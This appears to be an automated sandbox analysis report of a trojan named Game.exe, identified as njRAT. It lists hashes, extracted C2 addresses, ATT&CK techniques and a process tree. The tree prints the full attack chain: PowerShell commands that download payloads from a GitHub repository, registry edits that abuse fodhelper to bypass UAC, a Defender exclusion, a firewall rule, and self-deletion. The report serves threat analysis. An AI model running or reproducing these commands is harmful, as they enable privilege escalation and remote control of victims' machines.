Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-10-2024 12:01
Static task
static1
Behavioral task
behavioral1
Sample
Game.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Game.exe
Resource
win10v2004-20241007-en
General
-
Target
Game.exe
-
Size
106KB
-
MD5
f1137777be5beef3c2b15c4e6dab2dd1
-
SHA1
2d97bc31df4308c85fcd05243448ad89c836f4c0
-
SHA256
3be12c22cc954da3bde7d99a82deb9271ea87a10a3276daf569e3e291e6bc212
-
SHA512
8509e989413f9d36a78012de28eda57e58f1f14f209f20f35706760efeeb9d846802a7f274000fdb7f3836f49f9b2a4c398437b0503f0e439bc5e0d69533ae6d
-
SSDEEP
384:fg4sWrur+ibXr4TP4aJnSt3rFNO99Sjvb99SjvWp:fAuin4Tgc23r69Sbh9Sb
Malware Config
Extracted
njrat
0.7d
HacKed
hakim32.ddns.net:2000
82.9.14.4:4646
90c26ff415b592142df35118cf595023
-
reg_key
90c26ff415b592142df35118cf595023
-
splitter
|'|'|
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 13 1744 powershell.exe 32 1076 powershell.exe -
pid Process 3216 powershell.exe 1744 powershell.exe 1076 powershell.exe 3756 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2700 netsh.exe -
Executes dropped EXE 2 IoCs
pid Process 1636 noob.exe 4692 client.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" noob.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 4 raw.githubusercontent.com 13 raw.githubusercontent.com 32 raw.githubusercontent.com 3 raw.githubusercontent.com -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 2564 timeout.exe 3996 timeout.exe 2248 timeout.exe 2948 timeout.exe 4996 timeout.exe -
Modifies registry class 13 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\noob.exe" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\ reg.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1744 powershell.exe 1744 powershell.exe 3756 powershell.exe 3756 powershell.exe 3756 powershell.exe 1076 powershell.exe 1076 powershell.exe 3216 powershell.exe 3216 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4692 client.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeDebugPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe Token: 33 4692 client.exe Token: SeIncBasePriorityPrivilege 4692 client.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 4976 wrote to memory of 3604 4976 Game.exe 86 PID 4976 wrote to memory of 3604 4976 Game.exe 86 PID 3604 wrote to memory of 1744 3604 cmd.exe 89 PID 3604 wrote to memory of 1744 3604 cmd.exe 89 PID 3604 wrote to memory of 2404 3604 cmd.exe 90 PID 3604 wrote to memory of 2404 3604 cmd.exe 90 PID 3604 wrote to memory of 4036 3604 cmd.exe 91 PID 3604 wrote to memory of 4036 3604 cmd.exe 91 PID 3604 wrote to memory of 2948 3604 cmd.exe 92 PID 3604 wrote to memory of 2948 3604 cmd.exe 92 PID 3604 wrote to memory of 736 3604 cmd.exe 97 PID 3604 wrote to memory of 736 3604 cmd.exe 97 PID 3604 wrote to memory of 4996 3604 cmd.exe 98 PID 3604 wrote to memory of 4996 3604 cmd.exe 98 PID 3604 wrote to memory of 208 3604 cmd.exe 102 PID 3604 wrote to memory of 208 3604 cmd.exe 102 PID 3604 wrote to memory of 2564 3604 cmd.exe 103 PID 3604 wrote to memory of 2564 3604 cmd.exe 103 PID 208 wrote to memory of 1636 208 fodhelper.exe 104 PID 208 wrote to memory of 1636 208 fodhelper.exe 104 PID 1636 wrote to memory of 4672 1636 noob.exe 105 PID 1636 wrote to memory of 4672 1636 noob.exe 105 PID 4672 wrote to memory of 2152 4672 cmd.exe 107 PID 4672 wrote to memory of 2152 4672 cmd.exe 107 PID 2152 wrote to memory of 3952 2152 net.exe 108 PID 2152 wrote to memory of 3952 2152 net.exe 108 PID 4672 wrote to memory of 3756 4672 cmd.exe 109 PID 4672 wrote to memory of 3756 4672 cmd.exe 109 PID 3604 wrote to memory of 1076 3604 cmd.exe 110 PID 3604 wrote to memory of 1076 3604 cmd.exe 110 PID 3604 wrote to memory of 3996 3604 cmd.exe 111 PID 3604 wrote to memory of 3996 3604 cmd.exe 111 PID 3604 wrote to memory of 4692 3604 cmd.exe 113 PID 3604 wrote to memory of 4692 3604 cmd.exe 113 PID 3604 wrote to memory of 4692 3604 cmd.exe 113 PID 3604 wrote to memory of 2248 3604 cmd.exe 114 PID 3604 wrote to memory of 2248 3604 cmd.exe 114 PID 4692 wrote to memory of 2700 4692 client.exe 115 PID 4692 wrote to memory of 2700 4692 client.exe 115 PID 4692 wrote to memory of 2700 4692 client.exe 115 PID 3604 wrote to memory of 3216 3604 cmd.exe 117 PID 3604 wrote to memory of 3216 3604 cmd.exe 117 PID 3604 wrote to memory of 732 3604 cmd.exe 118 PID 3604 wrote to memory of 732 3604 cmd.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\Game.exe"C:\Users\Admin\AppData\Local\Temp\Game.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\TEMP\Mario.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/altabross/FUD-BATCH/refs/heads/main/1.exe' -OutFile 'C:\Users\Admin\noob.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f3⤵
- Modifies registry class
PID:2404
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Modifies registry class
PID:4036
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2948
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\Users\Admin\noob.exe" /f3⤵
- Modifies registry class
PID:736
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
PID:4996
-
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\noob.exe"C:\Users\Admin\noob.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SYSTEM32\cmd.execmd /c "yo.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\net.exenet session6⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session7⤵PID:3952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\AddExclusion.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/altabross/FUD-BATCH/refs/heads/main/Client.pdf' -OutFile 'C:\Users\Admin\AppData\Local\client.pdf'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:3996
-
-
C:\Users\Admin\AppData\Local\client.exe"C:\Users\Admin\AppData\Local\client.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\client.exe" "client.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2700
-
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Remove-Item 'HKCU:\Software\Classes\ms-settings\' -Recurse -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\delete_self.bat"3⤵PID:732
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57f9a7e91e5e96f61019637e0d525dbbb
SHA154ab8fb072914fe7d53137c5eb71fca9ae1f4d28
SHA25626c5b713d97ba5bda58e5b44c13aef9234dc72f55f7c29670b6f4cf029b6c164
SHA51279b31c876a3e089fa35a92aa27770fff78dbf88855d61455c4ddb89db0a4452cf3f4c419957f0aa0ae3e51a07938a4ae14d7b26b96c7de6ff3f317f817e0ac1c
-
Filesize
2KB
MD549e7d5f2a296b59afec08bc314bed998
SHA17f898bf195ffd46ce2d19fad0ce33155f6e47f5f
SHA256394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe
SHA512f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839
-
Filesize
1KB
MD5d0e1c617525af09af9b0051b916138ae
SHA1586774dbe2a91e0f4d180196262d91dd1401433b
SHA256bc27520eef90825c1fcbf89296fa16db633cf8ca7535d24a62385c56f746abe2
SHA5120e2d92340f2c0368bee2cfa7a5ca1feb5be8899d232425400279fab62e9c4fdc9e1700f3957a1f17edff3ce5d27b35efb8bb5ef4657ffdcce49c47cb9d42d3a6
-
Filesize
944B
MD54cb59d549e8c5d613ea4b7524088528a
SHA15bdfb9bc4920177a9e5d4b9c93df65383353ab22
SHA256a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a
SHA512a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52
-
Filesize
1KB
MD581e9aca8879716c9e900c79bd5cb4150
SHA116b94cf2373787c68d81278aafb734557a890f0e
SHA25669618d438dc03cafb961e56e8bf4d715da822efce3c10154d6c18094286443a2
SHA5126c08b57255ba8eb5fac42e568e4eca649c78b34c4beed01fda4370b2282199f7b3a8479664d36425fc5352b11a1653b0b8a7a09f6a3d254d7344591d3c83ebb3
-
Filesize
72B
MD5bff23a9ba114f3a0a93710bbafc667ca
SHA1b24d77d2b9fc06f6493a846dc97d61b30048d461
SHA2568acfdd50f5146cf11c1a5ae8ccfe935b05395f9600e3889dc548a41f82cec6d6
SHA512674bb88f5bfec52d409f53e1342007e9b595659d94cfa6b359b14b51f89a1c2f505ff061bffcfd84f0b6748b30143d0116f60ced4fd760391c400a5ad2634521
-
Filesize
466B
MD518b38d63fc221213d032e3dfc11566a3
SHA10e28db3426f495088c17da65fb124ef0609710ac
SHA25687f13ab6599266825bc38f3288074e8bdcb191a14f5cf582dd076a0d15838900
SHA5123c86c585bbf52d68e3fb00fde7d2b3fdca9ae983bf1c8e26dbb7aaf031463ad467cb2936552232f99f3e50c458ff9361d2a26c61958f457c180deaa0a0b4a7d8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
97B
MD5d5030d208cc9cc03603d32ea8c775cfe
SHA1ff9c683aab2346852c43a380447bfe42d4a18fe2
SHA256b038a838393378a9e71235af38ec262af0f78d4ffa61dd7f634f48d02759260c
SHA512143a8be071a9447cededa50e67475773c3e335a38e6d4ab19b1cb6463689ffd27ba067ee1f2a1822d12065676ee1d527d7a67e6be0e8f2d8c1e379f8217bc292
-
Filesize
93KB
MD5da3667f8eb78acdef8173f3a729b3f58
SHA15e5615e89c2a29b78223d9eae96b3c002237a3a8
SHA25690ebb6177b2cef8eb02865f824b3c7882346e10264a41f360eba0e99215e4220
SHA5125196bc6f6b624078b8dc697f43cf53163320e2d45d91d4535eb00e14449ecb4a43f0b782f5bc65af2808086cefbde3c781d2afaa1ecb6f4e24259bb588e5c303
-
Filesize
154KB
MD52d019540d9821037f1c96050cf7f551b
SHA1e11ad8ed9c9ec6491ee87d845c7676eea2d57b06
SHA256b451357babe39ec8af9b1a56e8c981ed55b2941094940da50abd70222cb5f8a7
SHA512884df45aa8d83aadb82f331fa4488419e43b7c774ce2b853913cc8178746d8f48d1c86966e689397a0df114ce8550dde9fb9303bd86fb18d73442b4f89243add